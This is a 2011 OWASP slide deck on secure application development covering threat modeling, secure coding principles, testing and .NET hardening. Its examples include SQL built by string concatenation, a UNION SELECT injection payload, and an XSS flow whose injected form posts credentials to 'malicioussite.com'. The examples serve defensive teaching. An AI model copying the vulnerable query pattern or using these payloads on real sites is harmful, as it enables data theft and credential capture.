Secure Application Development. OWASP September 28, The OWASP Foundation

Similar documents
OWASP March 19, The OWASP Foundation Secure By Design

Kenna Platform Security. A technical overview of the comprehensive security measures Kenna uses to protect your data

C1: Define Security Requirements

Protect Your Application with Secure Coding Practices. Barrie Dempster & Jason Foy JAM306 February 6, 2013

Cloudy with a chance of hack. OWASP November, The OWASP Foundation Lars Ewe CTO / VP of Eng. Cenzic

Secure coding practices

Application Layer Security

OWASP Top 10 The Ten Most Critical Web Application Security Risks

E-guide Getting your CISSP Certification

CSWAE Certified Secure Web Application Engineer

Threat Modeling. Bart De Win Secure Application Development Course, Credits to

Practical Guide to Securing the SDLC

"Charting the Course to Your Success!" Securing.Net Web Applications Lifecycle Course Summary

Solutions Business Manager Web Application Security Assessment

10 FOCUS AREAS FOR BREACH PREVENTION

Guide to cyber security/cip specifications and requirements for suppliers. September 2016

Information Technology General Control Review

The Common Controls Framework BY ADOBE

Keep the Door Open for Users and Closed to Hackers

Data Security and Privacy : Compliance to Stewardship. Jignesh Patel Solution Consultant,Oracle

QuickBooks Online Security White Paper July 2017

Security Fundamentals for your Privileged Account Security Deployment

Certified Secure Web Application Engineer

SDR Guide to Complete the SDR

Technology Risk Management in Banking Industry. Rocky Cheng General Manager, Information Technology, Bank of China (Hong Kong) Limited

OWASP TOP Release. Andy Willingham June 12, 2018 OWASP Cincinnati

Reviewing the 2017 Verizon DBIR

Application and Data Security with F5 BIG-IP ASM and Oracle Database Firewall

Cybersecurity: Considerations for Internal Audit. Gina Gondron Senior Manager Frazier & Deeter Geek Week August 10, 2016

Simplifying Application Security and Compliance with the OWASP Top 10

SECURITY TESTING. Towards a safer web world

Cybersecurity and Nonprofit

Healthcare HIPAA and Cybersecurity Update

University of Pittsburgh Security Assessment Questionnaire (v1.7)

IBM SmartCloud Notes Security

Securing Privileged Access and the SWIFT Customer Security Controls Framework (CSCF)

Introduction F rom a management perspective, application security is a difficult topic. Multiple parties within an organization are involved, as well

Secure Access & SWIFT Customer Security Controls Framework

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Cyber Security and Data Protection: Huge Penalties, Nowhere to Hide

Students should have an understanding and a working knowledge in the following topics, or attend these courses as a pre-requisite:

Florida Government Finance Officers Association. Staying Secure when Transforming to a Digital Government

A (sample) computerized system for publishing the daily currency exchange rates

What are PCI DSS? PCI DSS = Payment Card Industry Data Security Standards

HIPAA Regulatory Compliance

TEL2813/IS2820 Security Management

DATA SHEET RISK & CYBERSECURITY PRACTICE EMPOWERING CUSTOMERS TO TAKE COMMAND OF THEIR EVOLVING RISK & CYBERSECURITY POSTURE

TARGET2-SECURITIES INFORMATION SECURITY REQUIREMENTS

90% 191 Security Best Practices. Blades. 52 Regulatory Requirements. Compliance Report PCI DSS 2.0. related to this regulation

Securing Devices in the Internet of Things

How NOT To Get Hacked

Information Security Policy

SECURING DEVICES IN THE INTERNET OF THINGS

Copyright

epldt Web Builder Security March 2017

90% of data breaches are caused by software vulnerabilities.

The Top 6 WAF Essentials to Achieve Application Security Efficacy

Security Policies and Procedures Principles and Practices

Cybersecurity Risk Mitigation: Protect Your Member Data. Introduction

SAP Security. BIZEC APP/11 Version 2.0 BIZEC TEC/11 Version 2.0

PT Unified Application Security Enforcement. ptsecurity.com

Cybersecurity The Evolving Landscape

NERC CIP VERSION 6 BACKGROUND COMPLIANCE HIGHLIGHTS

DIGITAL TRUST AT THE CORE

Security and Architecture SUZANNE GRAHAM

Securing Apache Tomcat. AppSec DC November The OWASP Foundation

EBOOK 4 TIPS FOR STRENGTHENING THE SECURITY OF YOUR VPN ACCESS

NOTHING IS WHAT IT SIEMs: COVER PAGE. Simpler Way to Effective Threat Management TEMPLATE. Dan Pitman Principal Security Architect

SECURING DEVICES IN THE INTERNET OF THINGS

Bank Infrastructure - Video - 1

The SANS Institute Top 20 Critical Security Controls. Compliance Guide

Privileged Account Security: A Balanced Approach to Securing Unix Environments

About the company. What we do? Cybersecurity solutions adapted to protect enterprise business applications (SAP & Oracle).

Achieving End-to-End Security in the Internet of Things (IoT)

Checklist: Credit Union Information Security and Privacy Policies

Cyber Protections: First Step, Risk Assessment

A company built on security

RSA Solution Brief. The RSA Solution for VMware. Key Manager RSA. RSA Solution Brief

Cyber Security. February 13, 2018 (webinar) February 15, 2018 (in-person)

Top 10 Database Security Threats and How to Stop Them. Rob Rachwald Director of Security Strategy

Question 1: What steps can organizations take to prevent incidents of cybercrime? Answer 1:

Information Technology Security Plan Policies, Controls, and Procedures Protect: Identity Management and Access Control PR.AC

W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s

CS 356 Operating System Security. Fall 2013

SOC-2 Requirement Solution Brief. EventTracker 8815 Centre Park Drive, Columbia MD SOC-2

Oracle Security Products and Their Relationship to EBS. Presented By: Christopher Carriero

Cyber Security Program

FairWarning Mapping to PCI DSS 3.0, Requirement 10

ADDING BUSINESS VALUE THROUGH EFFECTIVE IT SECURITY MANAGEMENT

Information Security for Mail Processing/Mail Handling Equipment

How do you track devices that have been approved for use? Are you automatically alerted if an unapproved device connects to the network?

Security Management Models And Practices Feb 5, 2008

ISO/IEC Solution Brief ISO/IEC EventTracker 8815 Centre Park Drive, Columbia MD 21045

SYMANTEC: SECURITY ADVISORY SERVICES. Symantec Security Advisory Services The World Leader in Information Security

OWASP TOP OWASP TOP

Threat Modeling for System Builders and System Breakers!! Dan Copyright 2014 Denim Group - All Rights Reserved

CYBER FRAUD & DATA BREACHES 16 CPE s May 16-17, 2018

MigrationWiz Security Overview

INFORMATION SECURITY-SECURITY INCIDENT RESPONSE

Juniper Vendor Security Requirements

Transcription:

Secure Application Development September 28, 2011 Rohini Sulatycki Senior Security Consultant Trustwave rsulatycki@trustwave.com Copyright The Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the License. The Foundation http://www.owasp.org

Table of Contents Security Landscape Why do security vulnerabilities occur? Secure By Design Threat Modeling Design Patterns Secure By Implementation Top 10 Securely Deployed Testing Penetration Testing Configuration Maintenance 2

Application Security Landscape An April 2011 Forrester Research study Application Security: 2011 & Beyond found that even though secure application development is considered a top priority by IT professionals, web application hacking continues to be the number one source of data breach incidents. Part of the challenge is getting development organizations to undergo the culture shift required to making risk management and mitigation in application development a priority. 3

Application Security Landscape According to Verizon Business 2010 Data Breach Investigations Report web application hacking was the No. 1 attack pathway for data breaches, accounting for 54% of all the breach incidents and 92% of all the records breached. 4

Cost Of A Data Breach A recent survey by Ponemon Institute and Symantec of 51 cases found that a data breach cost, on average, $7.2 million per breach to make things right. 5

6 Importance of Security Public Relations Financial Risk of negative media exposure due to Perception that you have not properly protected or secured data shared with third parties Belief that you are sharing too much or unnecessary data with third parties Perception that you are behind the competition or below industry standards in providing policies and tools to secure customer data Your potential cost related to a compromise Cost of fraud, lost goods or services, interrupted sales Loss of repeat customers Adverse impact on company share price Monetary damages arising from litigation Regulatory/ Compliance Legal ramifications if there was a security breach Cardmembers, individually and as class-action members, may seek damages incurred from theft, fraud, or other misuse-use of the Cardmember s data. Might lead to governmental sanctions

7

Why do Security Vulnerabilities Occur? Lack of requirements The security features just don t get built in Security is just not a priority Lack of cost justification Lack of time Rush software out without adequate testing Lack of training Some security vulnerabilities occur due to developers need to facilitate testing Developers bypass security features such as account lockouts, timeouts, introduction of verbose error messages, weak password policies, test accounts 8

Too much reliance on developers implementing security. Developers are not security experts! Many things have to be done correctly! Physical Security Infrastructure Security Application Configuration Validation of User Input Authentication Mechanisms Authorization Controls Error Handling and Error Recovery Log File Generation Database Security and Data storage 9

Security Foundations: Concepts 10

11 I-A-C Triad

I-A-C-A Integrity is the property that enterprise assets are not altered in a manner contrary to the enterprise s wishes. Availability is the property that enterprise assets, including business processes, will be accessible when needed for authorized use. Confidentiality is the property that data is disclosed only as intended by the enterprise. Accountability is the property that actions affecting enterprise assets can be traced to the actor responsible for the action. 12

Application Attack Surface The amount of accessible functionality an application has that may be tested by an attacker is called an attack surface 13

Secure By Design 14

15 Threat Modeling

Threat Modeling Threat modeling is an engineering technique you can use to help you identify threats, attacks, vulnerabilities, and countermeasures in the context of your application scenario. The threat modeling activity helps you to: Identify your security objectives. Identify relevant threats. Identify relevant vulnerabilities and countermeasures. 16

Step 1: Identify Security Objectives What can we prevent? What do we care most about? What is the worst thing that can happen? What regulations do we need to be aware of? 17

Step 2: Identify Trust Boundaries Where are the entry points? Search page Registration page Login Shopping Cart Checkout Can you trust the data? Can you trust the caller? Where are the exit points where data is being written back? 18

Step 3: Identify Threats Brute force attacks against the dictionary store Network eavesdropping between browser and Web server to capture client credentials Attacker captures authentication cookie to spoof identity SQL injection Cross-site scripting (XSS) where an attacker injects script code Cookie replay or capture, enabling an attacker to spoof identity and access the application as another user Information disclosure with sensitive exception details propagating to the client Unauthorized access to the database if an attacker manages to take control of the Web server and run commands against the database Discovery of encryption keys used to encrypt sensitive data (including client credit card numbers) in the database Unauthorized access to Web server resources and static files 19

Step 4: Identify Vulnerabilities and Counter- Measures Armed with a list of threats consider how the application handles these threats. Sample questions to consider: How, specifically, will input validation be performed in this application? Are we validating all input? How are cookie values validated? What level of logging will be in place? How will this be handled? How will we protect user sessions? 20

Security Design Patterns A pattern can be characterized as a solution to a problem that arises within a specific context. A proven solution to a problem. 21

Security Design Patterns Secure Logger Remote logging for decentralized systems Input Validator Validate input against acceptable criteria Clear Sensitive Information Exception Manager Wrap and sanitize exceptions 22

Secure By Implementation 23

Development Know and use tested libraries ESAPI input validator Consistent use of coding standards and development processes Develop unit test cases for all threats identified during design Perform Peer Code Reviews Consider providing Security Training for your developers Additionally there are a lot of free resources such as local meetings 24

Top 10 25

Top 10 Secure Coding Practices 1) Minimize Attack Surface 2) Establish Secure Defaults 3) Principle of Least Privilege 4) Principle of Defense in Depth 5) Fail Securely 6) Don t Trust Services 7) Separation of Duties 8) Keep Security Simple 9) Fix Security Issues Correctly http://www.owasp.org/index.php/secure_coding_principles 26

CERT Top 10 Secure Coding Practices 1) Validate Input 2) Heed Compiler Warnings 3) Architect and Design for Security Policies 4) Keep It Simple 5) Default Deny 6) Least Privilege 7) Sanitize Data 8) Defense In-Depth 9) Effective Quality Assurance 10) Secure Coding Standard https://www.securecoding.cert.org/confluence/display/seccode/top+10+secure+coding+practices 27

Example SQL Injection con = this.getconnection(); stmt = con.createstatement(); str = "SELECT * FROM product where prod_cat= + prod_cat + ; prod_cat=%27%20union%20select %20null,null,null,table_schema,null,null,null,null %20FROM+information_schema.tables--+ will list all databases in the system 28

SQL Injection - Mitigation Use an interface that supports bind variables (prepared statements, or stored procedures) Bind variables allow the interpreter to distinguish between code and data 29

Example String selectstatement = "SELECT * FROM product where prod_cat =? "; PreparedStatement prepstmt = con.preparestatement (selectstatement); prepstmt.setstring(1, prodcat); ResultSet rs = prepstmt.executequery(); 30

Example - Cross-Site Scripting Any page that accepts user input and then uses that data in a way that displays the input back to the user Any page that directly writes POST or GET variables back to the user s browser This almost always will result in a XSS 31

32 Cross-Site Scripting (1) Attacker Emails link: http://testsite.org/login.aspx? format= ><script> </script> (2) User clicks link: http://testsite.org/login.aspx? format= ><script> </script> (3) Page returns with Embedded redirection code <Form action= http://malicioussite.com/stealcreds.aspx Method= POST > (4) User POSTs creds to Malicioussite.com (5) Server logs Stolen credentials, Allowing the hacker to retrieve them

Cross-Site Scripting - Mitigation Use the most restrictive input-validation method possible to avoid accepting unnecessary characters Use exact match or white-list input validation Encode characters using appropriate location 33

Testing Unit Testing Application Testing against requirements Application Penetration Test 34

Like A Rock Securely Deployed 35

Deployment Configure settings, system patches/updates, backups, etc Disable test and default accounts Important to ensure system is deployed in a secure manner Proper server configuration and hardening Access controls are appropriately applied Test and debug components are not enabled 36

.NET Example Ensure that Trace is disabled in the production configuration as follows: <configuration> <system.web> <trace enabled="false" localonly="true"> Ensure that Custom Errors are enabled in the production configuration as follows: <configuration> <system.web> <customerrors mode="remoteonly"> Ensure that Debug is disabled in production as follows: 37

.NET Example contd. <configuration> <system.web> <compilation debug="false"> Ensure that ValidateRequest is set to true in production as follows: <system.web> <pages validaterequest ="true" /> Ensure that view state protection is enabled and tamper proof in production machine.config as follows: <pages enableviewstate="true" enableviewstatemac="true" /> 38

Maintenance Ongoing maintenance of application once it has been deployed Reviewing logs Deploying system and application patches Backup and Disaster recovery Monitoring and logging Perform Application penetration Tests upon major changes Consider using a WAF for continuous security 39

Questions? 40

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback